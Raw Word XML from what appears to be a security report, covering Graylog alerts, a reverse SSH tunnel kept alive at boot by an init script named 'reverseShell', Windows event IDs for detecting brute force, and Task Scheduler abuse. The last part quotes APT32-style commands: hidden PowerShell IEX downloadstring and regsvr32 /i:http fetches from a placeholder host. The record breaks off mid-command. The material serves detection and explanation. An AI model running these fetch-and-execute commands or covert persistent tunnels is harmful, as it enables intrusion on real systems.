        <w:t>Graylog supports some methods for sending alerts to administrator. Alert messages can be sent to administrator via email, http protocol, alert on the alert interface of Graylog, and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003802AB" w:rsidRDefault="007D073C" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc485303721"/>
      <w:r w:rsidRPr="00344A17">
        <w:lastRenderedPageBreak/>
        <w:t>Reverse SSH Port Forwarding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>Reverse SSH Port Forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. To try to put this as simple as can be, Reverse SSH is a technique through which you can access systems that are behind a firewall from the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>So instead of your machine doing a simple SSH, the server does an SSH and through the port forwarding makes sure that you can SSH back to the server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>How to reverse ssh port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D073C">
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D073C">
        <w:t xml:space="preserve"> SSH into a machine behind a firewall you will need to use Reverse SSH Port Forwarding. The machine in question needs to open an SSH connection to the outside world and include a -R tunnel whose entry point is the remote side (from server in our example) to connect to your machine, allocate a port there and make certain that any connection request on that port is then forwarded to the SSH port of the remote side (server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>From the remote server side run the following command on the server:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D073C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="00A53CB7" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">sh –R 2210:localhost:22 </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
          <w:rPr>
            <w:i/>
          </w:rPr>
          <w:t>username@yourMachine.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>Install and configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Clientside:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Config Generating SSH keys</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh-keygen -t rsa</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh userserver@IPServer mkdir -p .ssh</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; cat .ssh/id_rsa.pub | ssh userserver@IPServer 'cat &gt;&gt; .ssh/authorized_keys'</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh userserver@IPServer</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh-add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Config reverse shell to run on start up</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ubuntu@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ubuntu:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>$ cat /etc/init.d/reverseShell</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bin/sh</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while true</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do</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count=`ps aux | grep "ssh -f -N -R 6969" | wc -l`;</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lastRenderedPageBreak/>
        <w:t>if [ "$count</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>" !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>= "2" ]</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then</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 xml:space="preserve">   `ssh -f -N -T -R 6969:localhost:22 userserver@IPServer`;</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fi</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done</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exit 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t>Add the following command to /etc/rc.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>init.d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/reverseShell &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00A53CB7" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Server</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7" w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to r</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:t>aspberry pi with ssh via command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh -p 6969 ubuntu@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc485303722"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cobalt Strike</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">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FA5535" w:rsidRDefault="00FA5535" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc485303723"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>External Knowledge</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:t>Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows event log is a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Some of event ID on windows to detect brute force</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4378"/>
        <w:gridCol w:w="4402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00326F1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Login: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675</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos Login: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4789, 4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: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258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC: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40965</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB: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681</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>NTLM Login</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>2.2.6.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. The Task Scheduler does this by monitoring whatever criteria you choose to initiate the tasks (referred to as triggers) and then executing the tasks when the criteria is met.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>On the other hand, more malware is using Windows Task Scheduler to do its dirty work, such as backdoor, downloader and attack vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Some commands were used on APT 32 by task scheduler </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ powershell.exe -nop -w hidden -c  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="003137A0" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>IEX</w:t>
            </w:r>
            <w:r w:rsidR="00FA5535" w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00FA5535" w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>(new-object net.webclient).downloadstring('http://remoteaddress.org:80/a'))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ </w:t>
            </w:r>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>regsvr32 /s /n /u /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>i:http://remoteaddress:80/download</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
